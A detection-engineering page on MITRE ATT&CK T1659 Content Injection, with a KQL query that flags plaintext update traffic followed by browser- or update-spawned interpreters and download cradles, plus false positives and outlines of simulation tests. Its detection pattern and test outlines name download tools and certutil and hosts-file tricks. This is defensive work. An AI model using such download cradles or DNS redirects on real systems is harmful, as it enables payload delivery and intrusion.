T1659

Content Injection

Initial Access Command and Control Last updated:

This detection identifies adversary content injection attacks where malicious payloads are delivered by manipulating in-transit network traffic between victims and legitimate online services. Rather than hosting payloads on attacker-controlled websites, adversaries operating at a compromised network position—such as a compromised ISP or routing infrastructure—intercept and modify DNS, HTTP, or SMB responses before they reach the victim. The detection focuses on three behavioral indicators: suspicious interpreter or downloader processes spawned by web browsers or Windows Update components following unencrypted HTTP connections to known update domains; HTTP connections to Microsoft update infrastructure over plaintext port 80 (which should exclusively use HTTPS/443); and DNS resolutions of trusted domains returning IP addresses outside expected authoritative ranges. Known threat activity consistent with this technique includes MoustachedBouncer injecting fake Windows Update pages to deploy malware against diplomatic targets in Belarus, and the Disco implant achieving initial access through injected DNS, HTTP, and SMB replies that redirected victims to attacker-controlled download servers.

What is T1659 Content Injection?

Content Injection (T1659) maps to the Initial Access and Command and Control tactics — the adversary is trying to get into your network in MITRE ATT&CK.

This page provides production-ready detection logic for Content Injection, covering the data sources and telemetry it touches: Microsoft Defender for Endpoint. The queries below are rated high severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Initial Access Command and Control
Technique
T1659 Content Injection
Canonical reference
https://attack.mitre.org/techniques/T1659/
Microsoft Sentinel / Defender
kusto 
let LookbackTime = 1d;
let UpdateDomains = dynamic(["windowsupdate.com", "update.microsoft.com", "download.microsoft.com", "delivery.mp.microsoft.com"]);
let SuspiciousChildren = dynamic(["wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe", "powershell.exe", "cmd.exe"]);
let InjectionParents = dynamic(["svchost.exe", "wuauclt.exe", "usoclient.exe", "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"]);
let HttpUpdateConnections = DeviceNetworkEvents
| where TimeGenerated > ago(LookbackTime)
| where RemotePort == 80
| where RemoteUrl has_any (UpdateDomains)
| project DeviceId, DeviceName, NetworkTime = TimeGenerated, RemoteIP, RemoteUrl;
let SuspiciousSpawns = DeviceProcessEvents
| where TimeGenerated > ago(LookbackTime)
| where InitiatingProcessFileName in~ (InjectionParents)
| where FileName in~ (SuspiciousChildren)
| where ProcessCommandLine has_any ("http://", "invoke-webrequest", "wget", "curl", "-enc ", "download", "bitsadmin")
    or FolderPath has "temp" or FolderPath has "downloads"
| project DeviceId, DeviceName, ProcessTime = TimeGenerated, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName, SHA256;
HttpUpdateConnections
| join kind=inner SuspiciousSpawns on DeviceId
| where abs(datetime_diff('second', NetworkTime, ProcessTime)) <= 300
| project NetworkTime, ProcessTime, DeviceName, AccountName, RemoteIP, RemoteUrl, SuspiciousProcess = FileName, SuspiciousProcessPath = FolderPath, ProcessCommandLine, ParentProcess = InitiatingProcessFileName, ParentCommandLine = InitiatingProcessCommandLine, SHA256, TimeDeltaSec = abs(datetime_diff('second', NetworkTime, ProcessTime))
| order by NetworkTime desc

Correlates unencrypted HTTP connections to Microsoft update domains with suspicious child process spawning from browser or Windows Update service parents within a 5-minute window on the same device. The time-based join on DeviceId identifies cases where injected content was delivered over HTTP and immediately resulted in interpreter or downloader process execution — the expected post-injection behavior observed in MoustachedBouncer and Disco campaigns where victims received fake Windows Update payloads over manipulated HTTP responses.

high severity medium confidence

Data Sources

Microsoft Defender for Endpoint

Required Tables

DeviceNetworkEvents DeviceProcessEvents

False Positives

  • Legacy enterprise systems still configured to use HTTP for Windows Update (pre-WSUS TLS migration) may generate benign HTTP connections to update domains matched by the network filter
  • Corporate WSUS or SCCM proxy servers that use HTTP internally to redistribute updates will cause svchost.exe to connect to update domains over port 80 as a legitimate workflow
  • IT automation tools (SCCM client actions, Intune management extensions, Ansible) that legitimately spawn PowerShell or cmd.exe via svchost.exe as part of managed patch workflows
  • Developers testing HTTP client libraries or update utilities who manually trigger download cradles from a browser session within the 5-minute correlation window

Sigma rule & cross-platform mapping

The detection logic for Content Injection (T1659) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the following logsource: 

logsource:
  category: process_creation
  product: windows

Browse the community-maintained Sigma rules for this technique:

SigmaHQ rules for T1659 Sigma rules on detection.fyi

Platform-specific guides for T1659

Detect in Microsoft Sentinel (KQL) Detect in Splunk (SPL) Detect in Elastic Security (Elastic) Detect in IBM QRadar (QRadar) Detect in Sumo Logic CSE (Sumo) Detect in Google Chronicle (YARA-L) Detect in CrowdStrike LogScale (LogScale)
Last updated: 2026-03-20 Research depth: deep
References (5)

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate DNS Injection via Hosts File Redirect of Update Domain

    Expected signal: Sysmon Event ID 22 (DNS Query) showing download.microsoft.com with QueryResults containing 198.51.100.1; Sysmon Event ID 1 for nslookup.exe process creation with command line including 'download.microsoft.com'

  2. Test 2Simulated Injected Payload Execution from Browser-Spawned Process

    Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe with Invoke-WebRequest and http:// URI in CommandLine; Sysmon Event ID 3 showing powershell.exe attempting TCP connection to 198.51.100.1:80; working directory will be user profile or temp path

  3. Test 3LOLBin Certutil Download Cradle from Temp Path

    Expected signal: Sysmon Event ID 1 for certutil_test.exe (copied certutil) executing from %TEMP% path with -urlcache and http:// URL in CommandLine; Sysmon Event ID 3 for HTTP connection attempt from temp path binary to 198.51.100.1:80; Sysmon Event ID 11 for file copy creating certutil_test.exe in temp

Unlock Pro Content

Get the full detection package for T1659 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Tactic Hubs

TA0001Initial AccessTA0011Command and Control

Related Techniques

T1557Adversary-in-the-MiddleT1189Drive-by CompromiseT1105Ingress Tool TransferT1568.002Domain Generation AlgorithmsT1195.001Compromise Software Dependencies and Development ToolsT1071.004DNST1573.001Symmetric Cryptography

Same Tactic: Initial Access

Popular Detections